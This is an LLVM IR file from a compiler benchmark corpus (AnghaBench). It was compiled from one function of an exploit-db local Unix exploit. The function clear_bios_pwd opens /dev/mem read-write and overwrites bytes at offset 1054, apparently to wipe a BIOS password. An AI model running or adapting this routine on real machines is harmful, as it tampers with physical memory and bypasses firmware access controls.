; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/unix/local/extr_26753.c_clear_bios_pwd.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/unix/local/extr_26753.c_clear_bios_pwd.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.dumpbuff = type { i8* }

@.str = private unnamed_addr constant [9 x i8] c"/dev/mem\00", align 1
@.str.1 = private unnamed_addr constant [3 x i8] c"r+\00", align 1
@SEEK_SET = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [19 x i8] c"\0A[Buffer Cleared]\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @clear_bios_pwd() #0 {
  %1 = alloca i32*, align 8
  %2 = alloca %struct.dumpbuff, align 8
  %3 = alloca i32, align 4
  %4 = alloca i64, align 8
  store i64 1054, i64* %4, align 8
  store i32 0, i32* %3, align 4
  br label %5

5:                                                ; preds = %14, %0
  %6 = load i32, i32* %3, align 4
  %7 = icmp slt i32 %6, 32
  br i1 %7, label %8, label %17

8:                                                ; preds = %5
  %9 = getelementptr inbounds %struct.dumpbuff, %struct.dumpbuff* %2, i32 0, i32 0
  %10 = load i8*, i8** %9, align 8
  %11 = load i32, i32* %3, align 4
  %12 = sext i32 %11 to i64
  %13 = getelementptr inbounds i8, i8* %10, i64 %12
  store i8 32, i8* %13, align 1
  br label %14

14:                                               ; preds = %8
  %15 = load i32, i32* %3, align 4
  %16 = add nsw i32 %15, 1
  store i32 %16, i32* %3, align 4
  br label %5

17:                                               ; preds = %5
  %18 = call i32* @fopen(i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str, i64 0, i64 0), i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.1, i64 0, i64 0))
  store i32* %18, i32** %1, align 8
  %19 = load i32*, i32** %1, align 8
  %20 = load i64, i64* %4, align 8
  %21 = load i32, i32* @SEEK_SET, align 4
  %22 = call i32 @fseek(i32* %19, i64 %20, i32 %21)
  %23 = load i32*, i32** %1, align 8
  %24 = call i32 @fwrite(%struct.dumpbuff* %2, i32 8, i32 1, i32* %23)
  %25 = load i32*, i32** %1, align 8
  %26 = call i32 @fclose(i32* %25)
  %27 = call i32 @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.2, i64 0, i64 0))
  ret i32 0
}

declare dso_local i32* @fopen(i8*, i8*) #1

declare dso_local i32 @fseek(i32*, i64, i32) #1

declare dso_local i32 @fwrite(%struct.dumpbuff*, i32, i32, i32*) #1

declare dso_local i32 @fclose(i32*) #1

declare dso_local i32 @printf(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
